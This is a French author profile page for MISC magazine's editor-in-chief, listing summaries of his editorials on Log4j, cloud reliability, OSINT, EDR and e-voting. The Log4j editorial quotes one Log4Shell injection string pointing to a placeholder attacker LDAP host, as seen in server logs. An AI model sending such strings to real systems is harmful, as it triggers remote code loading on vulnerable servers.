Foll Cédric

Foll Cédric

Rédacteur en chef du magazine MISC - Éditions Diamond

81 article(s)
Description

Diplômé de l’INSA de Rouen en génie mathématique, Cédric Foll a commencé sa carrière en réalisant des tests d'intrusion avant de devenir ingénieur sécurité puis RSSI du ministère de l’Éducation nationale. Aujourd’hui directeur des infrastructures numériques de l’université de Lille, il reste passionné par la sécurité des systèmes d’information et enseigne cette discipline en école d'ingénieur et master. Il coorganise depuis 2018 la conférence anglophone Pass The Salt, rassemblant les experts de la sécurité et de l'open source.

Lecteur de MISC depuis le premier numéro, il commence à rédiger des articles avant de rejoindre l’équipe éditoriale en 2010. En 2014, il devient rédacteur en chef de MISC succédant à Frédéric Raynal.

Signature
Rédacteur en chef du magazine MISC - Éditions Diamond
Photo
foll-cedric
Articles de l'auteur

Édito

Magazine
Marque
MISC
Numéro
119
Mois de parution
janvier 2022
Résumé

Nous nous souviendrons tous un moment de ce vendredi après-midi quand les premières annonces sur log4j sont arrivées et que nous avons tous vu dans nos logs se multiplier les “${jndi:ldap://mechanthacker.com/a}” en l’espace de quelques minutes. Pour beaucoup d’entre nous, le week-end a été long, une course contre la montre pour éviter de se retrouver avec un système d’information ressemblant à un champ de ruines le lundi matin, ou tout aussi probablement une ferme de minage de cryptomonnaies. Une caractéristique particulière de cette faille a certainement été le niveau de massification des attaques en l’espace de quelques heures. Tout serveur accessible sur les ports 80 et 443, même non référencé par les moteurs de recherche s’est retrouvé attaqué depuis des adresses IP multiples dès vendredi après-midi. Il est probable que certains groupes de pirates disposent d’ores et déjà d’une grande quantité de serveurs compromis qu’ils pourront monétiser dans un second temps, par exemple avec des campagnes de ransomware.

Introduction au dossier : Outils et méthodes pour l’analyse et la réponse à incident

Magazine
Marque
MISC
Numéro
119
Mois de parution
janvier 2022
Spécialité(s)
Résumé

Dans le cadre de l’amélioration du niveau de maturité de la gestion de la sécurité des systèmes d’information, il convient d'appréhender correctement les menaces. Si certaines d’entre elles sont génériques et communes à l’ensemble des organisations, d’autres vont cibler plus spécifiquement certaines typologies d’entreprises ou administrations. Typiquement, une banque, une société de e-commerce, un hôpital ou le ministère de la Défense ne vont pas faire l’objet de la même typologie d’attaquants ni du même outillage. Par conséquent, les IOC à rechercher en priorité sur vos infrastructures devront être adaptées à moins de rapidement épuiser vos forces.

Édito : Too big to fail

Magazine
Marque
MISC
Numéro
118
Mois de parution
novembre 2021
Résumé

Les principaux fournisseurs de Cloud peuvent proposer des SLA bien au-delà de ce que la plupart des DSI sont en capacité d’atteindre. Ainsi, pour une DSI, faire le choix de déployer ses applications sur un IaaS ou d’opter pour une messagerie en mode SaaS chez Google ou Microsoft permettra de garantir une certaine tranquillité d’esprit quant à l'amélioration du taux de disponibilité des applications gérées en interne sur ses propres infrastructures. N’en déplaise aux pseudos-spécialistes affirmant que l’auto-hébergement, parfois derrière une ligne ADSL pour les plus hardis, est à privilégier, c’est très loin d’être la solution la plus fiable. Pour atteindre un SLA de 99,9% à 99,99%, il faut non seulement un data center Tiers 3, plusieurs accès opérateurs avec des arrivées fibres empruntant des chemins distincts afin que la connectivité internet ne soit pas le maillon faible, mais surtout des briques logicielles sur lesquelles il doit être possible de réaliser des opérations de maintenance sans rupture de service.

Introduction au dossier : Techniques d’OSINT à l’usage des honnêtes gens

Magazine
Marque
MISC
Numéro
118
Mois de parution
novembre 2021
Spécialité(s)
Résumé

Afin de maximiser les chances de réussite lors d’une candidature, nous nous sommes tous prêtés au jeu de chercher des informations sur la société concernée ainsi que ses salariés actuels ou anciens. L’abondance d’informations accessibles, surtout depuis l’avènement des réseaux sociaux, qu’ils soient professionnels ou récréatifs, permet facilement d’obtenir de précieuses informations sur le fonctionnement de l’entreprise, les briques techniques utilisées, le parcours et la personnalité des recruteurs. Ces techniques peuvent également être utilisées dans une perspective offensive, tant le parcours des blogs techniques ou des fiches LinkedIn des salariés d’une entreprise peuvent être utiles non seulement pour déterminer l’ensemble des technologies utilisées dans l’entreprise, briques de sécurité comprises telles que les antivirus, EDR ou firewall, mais également pour reconstituer l’organigramme d’une société afin d’augmenter les chances d’une attaque s’appuyant sur du social engineering.

Introduction au dossier : Sécurisez votre production informatique

Magazine
Marque
MISC
Numéro
117
Mois de parution
septembre 2021
Spécialité(s)
Résumé

Quand j’ai commencé ma carrière, il n’était pas rare de recompiler le noyau des serveurs ou de faire des installations à coup de ./configure;make;make install. Dès lors, à chaque fois qu’un paquet de la distribution devait être installé, il fallait jouer avec les options --nodeps --force parce que la moitié des logiciels avaient été installés depuis les sources. Les fichiers de configuration dans /etc étaient suffixés par des extensions exotiques du type .backup, .sos, .nepaseffacer, .derniereversionquifonctionne...

Édito

Magazine
Marque
MISC
Numéro
117
Mois de parution
septembre 2021
Résumé

Il y a 8 ans, Edward Snowden révélait les capacités de la NSA en matière d’écoute et d’interception des communications. Le grand public découvrait que les États-Unis d’Amérique réalisaient des écoutes en masse des communications, étaient en capacité de les déchiffrer et avaient un accès direct aux données des principaux fournisseurs de services sur leur territoire.

Édito

Magazine
Marque
MISC
Numéro
116
Mois de parution
juillet 2021
Résumé

À chaque nouvelle élection, surtout lorsque le taux de participation est décevant, revient le marronnier du vote électronique par Internet : « Face à l’abstention massive, un chantier urgent s’impose : la modernisation du vote. Vote par correspondance, vote électronique sécurisé : notre démocratie doit s’adapter à nos vies d’aujourd’hui, en restant irréprochable ! » [1].

Introduction au dossier : EDR – Quel apport pour la sécurité de votre parc ?

Magazine
Marque
MISC
Numéro
116
Mois de parution
juillet 2021
Spécialité(s)
Résumé

La supervision de la sécurité des terminaux est souvent le parent pauvre des directions informatiques. Pendant longtemps, l’alpha et l'oméga en matière de gestion de la sécurité des terminaux se sont résumé à un antivirus, avec dans le meilleur des cas une console centralisée, l’application des patch tuesday et une authentification via contrôleur de domaine sans droits d'administration pour les usagers.

Édito

Magazine
Marque
MISC
Numéro
115
Mois de parution
mai 2021
Résumé

Le troisième confinement a donné lieu à une nouvelle fermeture des écoles, collèges et lycées, et une bascule de l’enseignement en distanciel. Malheureusement, les espaces numériques de travail (ENT) devant permettre aux enseignants d’interagir avec leurs élèves sont pour la plupart tombés en panne rendant impossible tout travail s’il n’avait pas été transmis par un autre canal. Si cela pouvait être compréhensible lors du premier confinement, la patience des enseignants, élèves et parents n’était plus la même un an plus tard, ces dysfonctionnements donnant l’impression d’une totale impréparation.